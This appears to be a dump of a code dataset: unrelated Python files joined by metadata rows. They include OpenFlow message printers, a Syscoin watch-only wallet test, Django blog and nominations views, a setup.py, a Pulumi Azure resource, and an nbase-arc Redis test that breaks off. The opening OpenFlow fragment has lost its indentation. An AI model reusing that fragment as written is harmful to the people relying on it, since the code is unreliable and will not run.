print_actions(msg.actions)
print_ofp_ovs(msg)
def _print_portMod_config_mask(variable, name):
print ('PortMod %s:' % name),
printed = False
for i in variable:
print of10.dissector.get_phy_config(i),
printed = True
else:
printed = _dont_print_0(printed)
print
def print_of_PortMod(msg):
print ('PortMod Port_no: %s HW_Addr %s Pad: %s' %
(msg.port_no, eth_addr(msg.hw_addr), print_pad(msg.pad)))
_print_portMod_config_mask(msg.config, 'config')
_print_portMod_config_mask(msg.mask, 'mask')
_print_portMod_config_mask(msg.advertise, 'advertise')
def print_of_BarrierReq(msg):
print 'OpenFlow Barrier Request'
def print_of_BarrierReply(msg):
print 'OpenFlow Barrier Reply'
def print_of_vendor(msg):
vendor = of10.dissector.get_ofp_vendor(msg.vendor)
print ('OpenFlow Vendor: %s' % vendor)
def print_ofp_statReq(msg):
if msg.stat_type == 0:
print_ofp_statReqDesc(msg)
    elif msg.stat_type == 1 or msg.stat_type == 2:
print_ofp_statReqFlowAggregate(msg)
elif msg.stat_type == 3:
print_ofp_statReqTable(msg)
elif msg.stat_type == 4:
print_ofp_statReqPort(msg)
elif msg.stat_type == 5:
print_ofp_statReqQueue(msg)
elif msg.stat_type == 65535:
print_ofp_statReqVendor(msg)
def print_ofp_statReqDesc(msg):
print 'StatReq Type: Description(%s)' % msg.stat_type
def print_ofp_statReqFlowAggregate(msg):
if msg.stat_type == 1:
type_name = 'Flow'
else:
type_name = 'Aggregate'
print ('StatReq Type: %s(%s)' % (type_name, msg.stat_type))
print_ofp_match(msg.stats.match)
out_port = of10.dissector.get_phy_port_id(msg.stats.out_port)
print ('StatReq Table_id: %s Pad: %s Out_Port: %s' % (msg.stats.table_id,
print_pad(msg.stats.pad), out_port))
def print_ofp_statReqTable(msg):
print 'StatReq Type: Table(%s)' % msg.stat_type
def print_ofp_statReqPort(msg):
port_number = of10.dissector.get_phy_port_id(msg.stats.port_number)
print ('StatReq Type: Port(%s): Port_Number: %s Pad: %s' %
(msg.stat_type, green(port_number), print_pad(msg.stats.pad)))
def print_ofp_statReqQueue(msg):
port_number = of10.dissector.get_phy_port_id(msg.stats.port_number)
print ('StatReq Type: Queue(%s): Port_Number: %s Pad: %s Queue_id: %s' %
(msg.stat_type, green(port_number), print_pad(msg.stats.pad),
msg.stats.queue_id))
def print_ofp_statReqVendor(msg):
vendor = of10.dissector.get_ofp_vendor(msg.stats.vendor_id)
print ('StatReq Type: Vendor(%s): Vendor_ID: %s' % (msg.stat_type,
vendor))
def print_ofp_statRes(msg):
if msg.stat_type == 0:
print_ofp_statResDesc(msg)
elif msg.stat_type == 1:
print_ofp_statResFlowArray(msg)
elif msg.stat_type == 2:
print_ofp_statResAggregate(msg)
elif msg.stat_type == 3:
print_ofp_statResTableArray(msg)
elif msg.stat_type == 4:
print_ofp_statResPortArray(msg)
elif msg.stat_type == 5:
print_ofp_statResQueueArray(msg)
elif msg.stat_type == 65535:
print_ofp_statResVendor(msg)
def print_ofp_statResDesc(msg):
print ('StatRes Type: Description(%s)' % (msg.stat_type))
print ('StatRes mfr_desc: %s' % (msg.stats.mfr_desc))
print ('StatRes hw_desc: %s' % (msg.stats.hw_desc))
print ('StatRes sw_desc: %s' % (msg.stats.sw_desc))
print ('StatRes serial_num: %s' % (msg.stats.serial_num))
print ('StatRes dp_desc: %s' % (msg.stats.dp_desc))
def print_ofp_statResFlowArray(msg):
if len(msg.stats.flows) == 0:
print ('StatRes Type: Flow(1)\nNo Flows')
return
for flow in msg.stats.flows:
print_ofp_statResFlow(flow)
def print_ofp_statResFlow(flow):
print ('StatRes Type: Flow(1)')
print ('StatRes Length: %s Table_id: %s Pad: %s ' %
(flow.length, flow.table_id, print_pad(flow.pad)))
print ('StatRes'),
print_ofp_match(flow.match)
print ('StatRes duration_sec: %s, duration_nsec: %s, priority: %s,'
' idle_timeout: %s, hard_timeout: %s, pad: %s, cookie: %s,'
' packet_count: %s, byte_count: %s' %
(flow.duration_sec, flow.duration_nsec,
flow.priority, flow.idle_timeout,
flow.hard_timeout, print_pad(flow.pad),
flow.cookie,
flow.packet_count, flow.byte_count))
print ('StatRes'),
print_actions(flow.actions)
def print_ofp_statResAggregate(msg):
print ('StatRes Type: Aggregate(2)')
print ('StatRes packet_count: %s, byte_count: %s flow_count: %s '
'pad: %s' %
(msg.stats.packet_count, msg.stats.byte_count,
msg.stats.flow_count, print_pad(msg.stats.pad)))
def print_ofp_statResTableArray(msg):
if len(msg.stats.tables) == 0:
print ('StatRes Type: Table(3)\nNo Tables')
return
print ('StatRes Type: Table(3)')
for table in msg.stats.tables:
print_ofp_statResTable(table)
def print_ofp_statResTable(table):
print ('StatRes table_id: %s, pad: %s, name: "%s", wildcards: %s, '
'max_entries: %s, active_count: %s, lookup_count: %s, '
'matched_count: %s' %
(table.table_id, print_pad(table.pad), table.name, hex(table.wildcards),
table.max_entries, table.active_count,
table.lookup_count, table.matched_count))
def print_ofp_statResPortArray(msg):
if len(msg.stats.ports) == 0:
print ('StatRes Type: Port(4)\nNo Ports')
return
for port in msg.stats.ports:
print_ofp_statResPort(port)
def print_ofp_statResPort(port):
print ('StatRes Type: Port(4)')
print ('StatRes port_number: %s rx_packets: %s rx_bytes: %s rx_errors: %s'
' rx_crc_err: %s rx_dropped: %s rx_over_err: %s rx_frame_err: %s\n'
'StatRes port_number: %s tx_packets: %s tx_bytes: %s tx_errors: %s'
' tx_dropped: %s collisions: %s pad: %s' %
(red(port.port_number), port.rx_packets,
port.rx_bytes, port.rx_errors, port.rx_crc_err,
port.rx_dropped, port.rx_over_err,
port.rx_frame_err, red(port.port_number),
port.tx_packets, port.tx_bytes, port.tx_errors,
port.tx_dropped, port.collisions, print_pad(port.pad)))
def print_ofp_statResQueueArray(msg):
if len(msg.stats.queues) == 0:
print 'StatRes Type: Queue(5)\nNo Queues'
return
    for queue in msg.stats.queues:
print_ofp_statResQueue(queue)
def print_ofp_statResQueue(queue):
print 'StatRes Type: Queue(5)'
print ('StatRes queue_id: %s length: %s pad: %s'
' tx_bytes: %s tx_packets: %s tx_errors: %s' %
(queue.queue_id, queue.length, print_pad(queue.pad),
queue.tx_bytes, queue.tx_packets, queue.tx_errors))
def print_ofp_statResVendor(msg):
print ('StatRes Type: Vendor(%s)' % (hex(65535)))
print ('StatRes vendor_id: %s' % (msg.stats.vendor_id))
print_ofp_statResVendorData(msg.stats.data)
def print_ofp_statResVendorData(data):
print ('StatRes Vendor Data: ')
hexdump(data)
def print_ofp_getConfigRes(msg):
print ('OpenFlow GetConfigRes - Flag: %s Miss_send_len: %s' %
(msg.flags, msg.miss_send_len))
def print_ofp_setConfig(msg):
print ('OpenFlow SetConfig - Flag: %s Miss_send_len: %s' %
(msg.flags, msg.miss_send_len))
def print_of_echoreq(msg):
print 'OpenFlow Echo Request'
def print_of_echores(msg):
print 'OpenFlow Echo Reply'
def print_portStatus(msg):
print ('OpenFlow PortStatus - Reason: %s Pad: %s' % (msg.reason,
print_pad(msg.pad)))
print_of_ports(msg.desc)
def print_packetInOut_layer2(of_xid, eth):
print ('%s' % of_xid),
tcpiplib.prints.print_layer2(eth)
def print_packetInOut_vlan(of_xid, vlan):
print ('%s Ethernet:' % of_xid),
tcpiplib.prints.print_vlan(vlan)
def print_of_packetIn(msg):
print ('PacketIn: buffer_id: %s total_len: %s in_port: %s reason: %s '
'pad: %s' %
(hex(msg.buffer_id), msg.total_len, green(msg.in_port),
green(msg.reason), print_pad(msg.pad)))
print_data(msg.data)
def print_of_packetOut(msg):
print ('PacketOut: buffer_id: %s in_port: %s actions_len: %s' %
(hex(msg.buffer_id),
green(of10.dissector.get_phy_port_id(msg.in_port)),
msg.actions_len))
    if msg.actions_len != 0:
print_actions(msg.actions)
print_data(msg.data)
def print_data(data):
"""
Print msg.data from both PacketIn and Packetout
Args:
data: msg.data - array of protocols
"""
next_protocol = '0x0000'
eth = data.pop(0)
tcpiplib.prints.print_layer2(eth)
next_protocol = eth.protocol
if next_protocol in [33024]:
vlan = data.pop(0)
tcpiplib.prints.print_vlan(vlan)
next_protocol = vlan.protocol
if next_protocol in [35020, 35138]:
lldp = data.pop(0)
tcpiplib.prints.print_lldp(lldp)
elif next_protocol in [34998]:
print 'OESS FVD'
elif next_protocol in [2048]:
ip = data.pop(0)
tcpiplib.prints.print_layer3(ip)
        if ip.protocol == 6:  # TCP
tcp = data.pop(0)
tcpiplib.prints.print_tcp(tcp)
elif next_protocol in [2054]:
arp = data.pop(0)
tcpiplib.prints.print_arp(arp)
def print_queueReq(msg):
print ('QueueGetConfigReq Port: %s Pad: %s' %
(msg.port, print_pad(msg.pad)))
def print_queueRes(msg):
print ('QueueGetConfigRes Port: %s Pad: %s' %
(msg.port, print_pad(msg.pad)))
if len(msg.queues) == 0:
print 'QueueGetConfigRes: No Queues'
return
for queue in msg.queues:
print_queueRes_queue(queue)
def print_queueRes_queue(queue):
print ('Queue_ID: %s Length: %s Pad: %s' %
(queue.queue_id, queue.length, print_pad(queue.pad)))
if len(queue.properties) == 0:
print 'QueueGetConfigRes: No Properties'
return
for property in queue.properties:
print_queueRes_properties(property)
def print_queueRes_properties(qproperty):
print ('Property: %s Length: %s Pad: %s' %
(qproperty.property, qproperty.length, print_pad(qproperty.pad)))
print_queueRes_prop_payload(qproperty.payload)
def print_queueRes_prop_payload(payload):
print ('Payload: Rate %s Pad: %s' %
(payload.rate, print_pad(payload.pad)))
| 32.452482
| 83
| 0.626164
|
860c7417dc432bdcf0dfe98079bb13d8e1db9f48
| 4,805
|
py
|
Python
|
test/functional/wallet_watchonly.py
|
Frank-GER/syscoin
|
efbdac67f9d3d37d75de3480b8bb2c539ad05dd4
|
[
"MIT"
] | 61
|
2016-03-09T10:42:05.000Z
|
2018-03-13T05:06:30.000Z
|
test/functional/wallet_watchonly.py
|
Frank-GER/syscoin
|
efbdac67f9d3d37d75de3480b8bb2c539ad05dd4
|
[
"MIT"
] | 153
|
2016-02-29T17:45:10.000Z
|
2018-03-16T23:37:02.000Z
|
test/functional/wallet_watchonly.py
|
Frank-GER/syscoin
|
efbdac67f9d3d37d75de3480b8bb2c539ad05dd4
|
[
"MIT"
] | 18
|
2016-03-02T21:50:44.000Z
|
2018-03-07T20:36:12.000Z
|
#!/usr/bin/env python3
# Copyright (c) 2018-2021 The Bitcoin Core developers
# Distributed under the MIT software license, see the accompanying
# file COPYING or http://www.opensource.org/licenses/mit-license.php.
"""Test createwallet watchonly arguments.
"""
from test_framework.blocktools import COINBASE_MATURITY
from test_framework.test_framework import SyscoinTestFramework
from test_framework.util import (
assert_equal,
assert_raises_rpc_error
)
class CreateWalletWatchonlyTest(SyscoinTestFramework):
def set_test_params(self):
self.num_nodes = 1
def skip_test_if_missing_module(self):
self.skip_if_no_wallet()
def run_test(self):
node = self.nodes[0]
self.nodes[0].createwallet(wallet_name='default')
def_wallet = node.get_wallet_rpc('default')
a1 = def_wallet.getnewaddress()
wo_change = def_wallet.getnewaddress()
wo_addr = def_wallet.getnewaddress()
self.nodes[0].createwallet(wallet_name='wo', disable_private_keys=True)
wo_wallet = node.get_wallet_rpc('wo')
wo_wallet.importpubkey(pubkey=def_wallet.getaddressinfo(wo_addr)['pubkey'])
wo_wallet.importpubkey(pubkey=def_wallet.getaddressinfo(wo_change)['pubkey'])
# generate some btc for testing
self.generatetoaddress(node, COINBASE_MATURITY + 1, a1)
# send 1 sys to our watch-only address
txid = def_wallet.sendtoaddress(wo_addr, 1)
self.generate(self.nodes[0], 1, sync_fun=self.no_op)
# getbalance
self.log.info('include_watchonly should default to true for watch-only wallets')
self.log.info('Testing getbalance watch-only defaults')
assert_equal(wo_wallet.getbalance(), 1)
assert_equal(len(wo_wallet.listtransactions()), 1)
assert_equal(wo_wallet.getbalance(include_watchonly=False), 0)
self.log.info('Test sending from a watch-only wallet raises RPC error')
msg = "Error: Private keys are disabled for this wallet"
assert_raises_rpc_error(-4, msg, wo_wallet.sendtoaddress, a1, 0.1)
assert_raises_rpc_error(-4, msg, wo_wallet.sendmany, amounts={a1: 0.1})
self.log.info('Testing listreceivedbyaddress watch-only defaults')
result = wo_wallet.listreceivedbyaddress()
assert_equal(len(result), 1)
assert_equal(result[0]["involvesWatchonly"], True)
result = wo_wallet.listreceivedbyaddress(include_watchonly=False)
assert_equal(len(result), 0)
self.log.info('Testing listreceivedbylabel watch-only defaults')
result = wo_wallet.listreceivedbylabel()
assert_equal(len(result), 1)
assert_equal(result[0]["involvesWatchonly"], True)
result = wo_wallet.listreceivedbylabel(include_watchonly=False)
assert_equal(len(result), 0)
self.log.info('Testing listtransactions watch-only defaults')
result = wo_wallet.listtransactions()
assert_equal(len(result), 1)
assert_equal(result[0]["involvesWatchonly"], True)
result = wo_wallet.listtransactions(include_watchonly=False)
assert_equal(len(result), 0)
self.log.info('Testing listsinceblock watch-only defaults')
result = wo_wallet.listsinceblock()
assert_equal(len(result["transactions"]), 1)
assert_equal(result["transactions"][0]["involvesWatchonly"], True)
result = wo_wallet.listsinceblock(include_watchonly=False)
assert_equal(len(result["transactions"]), 0)
self.log.info('Testing gettransaction watch-only defaults')
result = wo_wallet.gettransaction(txid)
assert_equal(result["details"][0]["involvesWatchonly"], True)
result = wo_wallet.gettransaction(txid=txid, include_watchonly=False)
assert_equal(len(result["details"]), 0)
self.log.info('Testing walletcreatefundedpsbt watch-only defaults')
inputs = []
outputs = [{a1: 0.5}]
options = {'changeAddress': wo_change}
no_wo_options = {'changeAddress': wo_change, 'includeWatching': False}
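        # includeWatching defaults to true for a watch-only wallet, so funding from
        # watch-only UTXOs succeeds; explicitly passing includeWatching=False must
        # fail with "Insufficient funds".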
result = wo_wallet.walletcreatefundedpsbt(inputs=inputs, outputs=outputs, options=options)
assert_equal("psbt" in result, True)
assert_raises_rpc_error(-4, "Insufficient funds", wo_wallet.walletcreatefundedpsbt, inputs, outputs, 0, no_wo_options)
self.log.info('Testing fundrawtransaction watch-only defaults')
rawtx = wo_wallet.createrawtransaction(inputs=inputs, outputs=outputs)
result = wo_wallet.fundrawtransaction(hexstring=rawtx, options=options)
assert_equal("hex" in result, True)
assert_raises_rpc_error(-4, "Insufficient funds", wo_wallet.fundrawtransaction, rawtx, no_wo_options)
if __name__ == '__main__':
CreateWalletWatchonlyTest().main()
| 42.901786
| 126
| 0.706556
|
26a16e0c8052a80bf622ebec0c3fe1511e108b00
| 2,853
|
py
|
Python
|
blog/views.py
|
javadebadi/django-blog
|
2dd3926158def8463385c0b554a623563888711d
|
[
"MIT"
] | null | null | null |
blog/views.py
|
javadebadi/django-blog
|
2dd3926158def8463385c0b554a623563888711d
|
[
"MIT"
] | null | null | null |
blog/views.py
|
javadebadi/django-blog
|
2dd3926158def8463385c0b554a623563888711d
|
[
"MIT"
] | null | null | null |
from django.http import HttpResponse
from django.shortcuts import render
from blog.models import (
Post,
ContactMessage,
)
from django.shortcuts import get_object_or_404
from blog.logic import BlogTokenize
from django.core.paginator import Paginator, EmptyPage, PageNotAnInteger
from blog.forms import ContactMessageForm
from django.core.mail import EmailMessage
# Create your views here.
def home(request):
posts = Post.objects.all()[:2]
return render(request, 'blog/index.html', context={'posts':posts})
def about(request):
return render(request, 'blog/about.html', context={})
def contact(request):
if request.method == 'POST':
form = ContactMessageForm(request.POST)
if form.is_valid():
print(" =============== Clean Data =================")
print(form.cleaned_data)
ContactMessage.objects.create(
name=form.cleaned_data.get("name"),
email=form.cleaned_data.get("email"),
message=form.cleaned_data.get("message"),
phone_number=form.cleaned_data.get("phone_number"),
)
# send email
email = EmailMessage(
'[Javad Blog]: Automatic Django Email', # subject
f"""
----------------------------------------------
Sender Email: {form.cleaned_data.get("email")}
----------------------------------------------
{form.cleaned_data.get("message")}
""", # body of the email
'javad.ebadi.1990.smtp@gmail.com', # sender
[
'javad.ebadi.1990.smtp@gmail.com',
'javad.ebadi.1990@gmail.com',
],
)
email.send()
return render(request, 'blog/thanks.html', context={})
else:
return HttpResponse('<p>Invalid Data</p>')
if request.method == 'GET':
form = ContactMessageForm()
return render(request, 'blog/contact.html', context={'form': form})
def post_list(request, tag_name=None):
if tag_name is None:
all_posts = Post.objects.all()
else:
all_posts = Post.objects.filter(tags__name__iexact=tag_name)
paginator = Paginator(all_posts, 3)
page_number = request.GET.get("page")
try:
page = paginator.page(page_number)
except EmptyPage:
page = paginator.page(paginator.num_pages)
except PageNotAnInteger:
page = paginator.page(1)
posts = page.object_list
context = {
'posts': posts,
'page': page,
}
return render(request, 'blog/post_list.html', context=context)
def post_detail(request, pk=None):
post = get_object_or_404(Post, pk=pk)
texts_tag = BlogTokenize(post.text).tokenize()
return render(request, 'blog/post.html', context={'post':post, 'texts_tag':texts_tag})
| 35.222222
| 90
| 0.592008
|
b017c8c5d23a64b9bc394f89d6d076adb3d08138
| 4,880
|
py
|
Python
|
nominations/views.py
|
berinhard/pythondotorg
|
c199ae139470b333e829b337c3409eda3c5841c8
|
[
"Apache-2.0"
] | 2
|
2021-04-06T16:22:51.000Z
|
2021-05-04T13:48:42.000Z
|
nominations/views.py
|
vishalsingha/pythondotorg
|
af59bc03f63cdea16b0f2bd98aae2dcec713c4c1
|
[
"Apache-2.0"
] | 7
|
2020-06-06T01:45:27.000Z
|
2021-12-13T20:39:27.000Z
|
nominations/views.py
|
vishalsingha/pythondotorg
|
af59bc03f63cdea16b0f2bd98aae2dcec713c4c1
|
[
"Apache-2.0"
] | 1
|
2021-08-21T10:36:44.000Z
|
2021-08-21T10:36:44.000Z
|
from django.contrib import messages
from django.views.generic import CreateView, UpdateView, DetailView, ListView
from django.urls import reverse
from django.http import Http404
from pydotorg.mixins import LoginRequiredMixin
from .models import Nomination, Nominee, Election
from .forms import NominationForm, NominationCreateForm
class ElectionsList(ListView):
model = Election
class NominationMixin:
def get_context_data(self, **kwargs):
context = super().get_context_data(**kwargs)
self.election = Election.objects.get(slug=self.kwargs["election"])
context["election"] = self.election
return context
class NomineeList(NominationMixin, ListView):
template_name = "nominations/nominee_list.html"
def get_queryset(self, *args, **kwargs):
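        # Once nominations are complete (or for superusers) the accepted and approved
        # nominees are public; while nominations are open an authenticated user only
        # sees their own record (anonymous users fall through and get None).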
election = Election.objects.get(slug=self.kwargs["election"])
if election.nominations_complete or self.request.user.is_superuser:
return Nominee.objects.filter(
accepted=True, approved=True, election=election
).exclude(user=None)
elif self.request.user.is_authenticated:
return Nominee.objects.filter(user=self.request.user)
class NomineeDetail(NominationMixin, DetailView):
def get(self, request, *args, **kwargs):
self.object = self.get_object()
if not self.object.visible(user=request.user):
raise Http404
context = self.get_context_data(object=self.object)
return self.render_to_response(context)
def get_queryset(self):
election = Election.objects.get(slug=self.kwargs["election"])
queryset = Nominee.objects.filter(election=election).select_related()
return queryset
def get_context_data(self, **kwargs):
context = super().get_context_data(**kwargs)
return context
class NominationCreate(LoginRequiredMixin, NominationMixin, CreateView):
model = Nomination
login_message = "Please login to make a nomination."
def get_form_kwargs(self):
kwargs = super(NominationCreate, self).get_form_kwargs()
kwargs.update({"request": self.request})
return kwargs
def get_form_class(self):
election = Election.objects.get(slug=self.kwargs["election"])
if election.nominations_complete:
messages.error(
self.request, f"Nominations for {election.name} Election are closed"
)
raise Http404(f"Nominations for {election.name} Election are closed")
return NominationCreateForm
def get_success_url(self):
return reverse(
"nominations:nomination_detail",
kwargs={"election": self.object.election.slug, "pk": self.object.id},
)
def form_valid(self, form):
form.instance.nominator = self.request.user
form.instance.election = Election.objects.get(slug=self.kwargs["election"])
if form.cleaned_data.get("self_nomination", False):
try:
nominee = Nominee.objects.get(
user=self.request.user, election=form.instance.election
)
except Nominee.DoesNotExist:
nominee = Nominee.objects.create(
user=self.request.user,
election=form.instance.election,
accepted=True,
)
form.instance.nominee = nominee
form.instance.accepted = True
return super().form_valid(form)
def get_context_data(self, **kwargs):
context = super().get_context_data(**kwargs)
return context
class NominationEdit(LoginRequiredMixin, NominationMixin, UpdateView):
model = Nomination
form_class = NominationForm
def get_success_url(self):
next_url = self.request.POST.get("next")
if next_url:
return next_url
elif self.object.pk:
return reverse(
"nominations:nomination_detail",
kwargs={"election": self.object.election.slug, "pk": self.object.id},
)
else:
return super().get_success_url()
def get_context_data(self, **kwargs):
context = super().get_context_data(**kwargs)
return context
class NominationView(DetailView):
def get(self, request, *args, **kwargs):
self.object = self.get_object()
if not self.object.visible(user=request.user):
raise Http404
context = self.get_context_data(object=self.object)
context["editable"] = self.object.editable(user=self.request.user)
return self.render_to_response(context)
def get_queryset(self):
queryset = Nomination.objects.select_related()
return queryset
def get_context_data(self, **kwargs):
context = super().get_context_data(**kwargs)
return context
| 33.424658
| 85
| 0.654098
|
56a796f40d600cca14a9163b05c44f3db5af6d9a
| 1,260
|
py
|
Python
|
setup.py
|
innovationOUtside/iframe-shot
|
1cc048f85b66828be9ac970f6b248d3afe588bc2
|
[
"MIT"
] | null | null | null |
setup.py
|
innovationOUtside/iframe-shot
|
1cc048f85b66828be9ac970f6b248d3afe588bc2
|
[
"MIT"
] | null | null | null |
setup.py
|
innovationOUtside/iframe-shot
|
1cc048f85b66828be9ac970f6b248d3afe588bc2
|
[
"MIT"
] | null | null | null |
from setuptools import setup, find_packages
import io
import os
VERSION = "0.0.1"
def get_long_description():
with io.open(
os.path.join(os.path.dirname(os.path.abspath(__file__)), "README.md"),
encoding="utf8",
) as fp:
return fp.read()
setup(
name="iframe-shot",
description="Grab screenshot of IFrame.",
long_description=get_long_description(),
long_description_content_type="text/markdown",
author="Tony Hirst",
version=VERSION,
license="MIT License",
packages=find_packages(),
install_requires=[
"ipython",
"selenium"
],
extras_require={},
entry_points="""
""",
url="https://github.com/innovationOUtside/iframe-shot",
project_urls={
"Source code": "https://github.com/innovationOUtside/iframe-shot",
"Issues": "https://github.com/innovationOUtside/iframe-shot/issues",
},
python_requires=">=3.6",
classifiers=[
"Topic :: Database",
"Programming Language :: Python :: 3.6",
"Programming Language :: Python :: 3.7",
"Programming Language :: Python :: 3.8",
"Programming Language :: Python :: 3.9",
"Programming Language :: Python :: 3.10",
],
zip_safe=False,
)
| 26.808511
| 78
| 0.619048
|
3fa22831fdbfdb00bcadbb594f8f2ade1ea08ba1
| 7,529
|
py
|
Python
|
sdk/python/pulumi_azure_nextgen/authorization/v20180301/policy_set_definition.py
|
test-wiz-sec/pulumi-azure-nextgen
|
20a695af0d020b34b0f1c336e1b69702755174cc
|
[
"Apache-2.0"
] | null | null | null |
sdk/python/pulumi_azure_nextgen/authorization/v20180301/policy_set_definition.py
|
test-wiz-sec/pulumi-azure-nextgen
|
20a695af0d020b34b0f1c336e1b69702755174cc
|
[
"Apache-2.0"
] | null | null | null |
sdk/python/pulumi_azure_nextgen/authorization/v20180301/policy_set_definition.py
|
test-wiz-sec/pulumi-azure-nextgen
|
20a695af0d020b34b0f1c336e1b69702755174cc
|
[
"Apache-2.0"
] | null | null | null |
# coding=utf-8
# *** WARNING: this file was generated by the Pulumi SDK Generator. ***
# *** Do not edit by hand unless you're certain you know what you are doing! ***
import warnings
import pulumi
import pulumi.runtime
from typing import Any, Mapping, Optional, Sequence, Union
from ... import _utilities, _tables
from . import outputs
from ._inputs import *
__all__ = ['PolicySetDefinition']
class PolicySetDefinition(pulumi.CustomResource):
def __init__(__self__,
resource_name: str,
opts: Optional[pulumi.ResourceOptions] = None,
description: Optional[pulumi.Input[str]] = None,
display_name: Optional[pulumi.Input[str]] = None,
metadata: Optional[Any] = None,
parameters: Optional[Any] = None,
policy_definitions: Optional[pulumi.Input[Sequence[pulumi.Input[pulumi.InputType['PolicyDefinitionReferenceArgs']]]]] = None,
policy_set_definition_name: Optional[pulumi.Input[str]] = None,
policy_type: Optional[pulumi.Input[str]] = None,
__props__=None,
__name__=None,
__opts__=None):
"""
The policy set definition.
:param str resource_name: The name of the resource.
:param pulumi.ResourceOptions opts: Options for the resource.
:param pulumi.Input[str] description: The policy set definition description.
:param pulumi.Input[str] display_name: The display name of the policy set definition.
:param Any metadata: The policy set definition metadata.
:param Any parameters: The policy set definition parameters that can be used in policy definition references.
:param pulumi.Input[Sequence[pulumi.Input[pulumi.InputType['PolicyDefinitionReferenceArgs']]]] policy_definitions: An array of policy definition references.
:param pulumi.Input[str] policy_set_definition_name: The name of the policy set definition to create.
:param pulumi.Input[str] policy_type: The type of policy definition. Possible values are NotSpecified, BuiltIn, and Custom.
"""
if __name__ is not None:
warnings.warn("explicit use of __name__ is deprecated", DeprecationWarning)
resource_name = __name__
if __opts__ is not None:
warnings.warn("explicit use of __opts__ is deprecated, use 'opts' instead", DeprecationWarning)
opts = __opts__
if opts is None:
opts = pulumi.ResourceOptions()
if not isinstance(opts, pulumi.ResourceOptions):
raise TypeError('Expected resource options to be a ResourceOptions instance')
if opts.version is None:
opts.version = _utilities.get_version()
if opts.id is None:
if __props__ is not None:
raise TypeError('__props__ is only valid when passed in combination with a valid opts.id to get an existing resource')
__props__ = dict()
__props__['description'] = description
__props__['display_name'] = display_name
__props__['metadata'] = metadata
__props__['parameters'] = parameters
if policy_definitions is None:
raise TypeError("Missing required property 'policy_definitions'")
__props__['policy_definitions'] = policy_definitions
if policy_set_definition_name is None:
raise TypeError("Missing required property 'policy_set_definition_name'")
__props__['policy_set_definition_name'] = policy_set_definition_name
__props__['policy_type'] = policy_type
__props__['name'] = None
__props__['type'] = None
alias_opts = pulumi.ResourceOptions(aliases=[pulumi.Alias(type_="azure-nextgen:authorization/latest:PolicySetDefinition"), pulumi.Alias(type_="azure-nextgen:authorization/v20170601preview:PolicySetDefinition"), pulumi.Alias(type_="azure-nextgen:authorization/v20180501:PolicySetDefinition"), pulumi.Alias(type_="azure-nextgen:authorization/v20190101:PolicySetDefinition"), pulumi.Alias(type_="azure-nextgen:authorization/v20190601:PolicySetDefinition"), pulumi.Alias(type_="azure-nextgen:authorization/v20190901:PolicySetDefinition"), pulumi.Alias(type_="azure-nextgen:authorization/v20200301:PolicySetDefinition")])
opts = pulumi.ResourceOptions.merge(opts, alias_opts)
super(PolicySetDefinition, __self__).__init__(
'azure-nextgen:authorization/v20180301:PolicySetDefinition',
resource_name,
__props__,
opts)
@staticmethod
def get(resource_name: str,
id: pulumi.Input[str],
opts: Optional[pulumi.ResourceOptions] = None) -> 'PolicySetDefinition':
"""
Get an existing PolicySetDefinition resource's state with the given name, id, and optional extra
properties used to qualify the lookup.
:param str resource_name: The unique name of the resulting resource.
:param pulumi.Input[str] id: The unique provider ID of the resource to lookup.
:param pulumi.ResourceOptions opts: Options for the resource.
"""
opts = pulumi.ResourceOptions.merge(opts, pulumi.ResourceOptions(id=id))
__props__ = dict()
return PolicySetDefinition(resource_name, opts=opts, __props__=__props__)
@property
@pulumi.getter
def description(self) -> pulumi.Output[Optional[str]]:
"""
The policy set definition description.
"""
return pulumi.get(self, "description")
@property
@pulumi.getter(name="displayName")
def display_name(self) -> pulumi.Output[Optional[str]]:
"""
The display name of the policy set definition.
"""
return pulumi.get(self, "display_name")
@property
@pulumi.getter
def metadata(self) -> pulumi.Output[Optional[Any]]:
"""
The policy set definition metadata.
"""
return pulumi.get(self, "metadata")
@property
@pulumi.getter
def name(self) -> pulumi.Output[str]:
"""
The name of the policy set definition.
"""
return pulumi.get(self, "name")
@property
@pulumi.getter
def parameters(self) -> pulumi.Output[Optional[Any]]:
"""
The policy set definition parameters that can be used in policy definition references.
"""
return pulumi.get(self, "parameters")
@property
@pulumi.getter(name="policyDefinitions")
def policy_definitions(self) -> pulumi.Output[Sequence['outputs.PolicyDefinitionReferenceResponse']]:
"""
An array of policy definition references.
"""
return pulumi.get(self, "policy_definitions")
@property
@pulumi.getter(name="policyType")
def policy_type(self) -> pulumi.Output[Optional[str]]:
"""
The type of policy definition. Possible values are NotSpecified, BuiltIn, and Custom.
"""
return pulumi.get(self, "policy_type")
@property
@pulumi.getter
def type(self) -> pulumi.Output[str]:
"""
The type of the resource (Microsoft.Authorization/policySetDefinitions).
"""
return pulumi.get(self, "type")
def translate_output_property(self, prop):
return _tables.CAMEL_TO_SNAKE_CASE_TABLE.get(prop) or prop
def translate_input_property(self, prop):
return _tables.SNAKE_TO_CAMEL_CASE_TABLE.get(prop) or prop
| 44.550296
| 624
| 0.665427
|
9a0e21107512af7795504a162c9d71a9fc65add8
| 29,358
|
py
|
Python
|
redis/tests/nbase-arc/commands_generic.py
|
lynix94/nbase-arc
|
4de3c20ebd2f5ed13ab83dbc6a608f44e812ca78
|
[
"Apache-2.0"
] | 176
|
2015-12-30T08:44:30.000Z
|
2022-03-15T08:10:39.000Z
|
redis/tests/nbase-arc/commands_generic.py
|
lynix94/nbase-arc
|
4de3c20ebd2f5ed13ab83dbc6a608f44e812ca78
|
[
"Apache-2.0"
] | 35
|
2016-03-24T08:29:51.000Z
|
2021-12-09T20:06:39.000Z
|
redis/tests/nbase-arc/commands_generic.py
|
lynix94/nbase-arc
|
4de3c20ebd2f5ed13ab83dbc6a608f44e812ca78
|
[
"Apache-2.0"
] | 65
|
2015-12-30T09:05:13.000Z
|
2022-03-15T08:10:43.000Z
|
import redis
def do_commands(conn, GW=True):
r = conn.do_generic_request
assert_equal = redis.rr_assert_equal
assert_subs = redis.rr_assert_substring
key = 'commands_genericxxxxxxxkey'
key2 = 'commands_genericxxxxxxkey2'
dest = 'commands_generic_xxxxxdest'
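    # Each block below exercises one command; the '| NAME | O/X | note |' comments
    # mirror the support matrix: O = works through the gateway, X = rejected with
    # 'ERR Unsupported' when GW is True.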
try:
# | APPEND | O | |
r('del', key)
r('APPEND', key, '1')
r('APPEND', key, '2')
assert_equal('12', r('get', key))
# | ASKING | X | |
resp = r('ASKING')
assert(resp.startswith('ERR Unsupported'))
# | AUTH | X | |
resp = r('AUTH', 'passwd')
if GW:
assert(resp.startswith('ERR Unsupported'))
else:
assert(resp.startswith('ERR Client sent'))
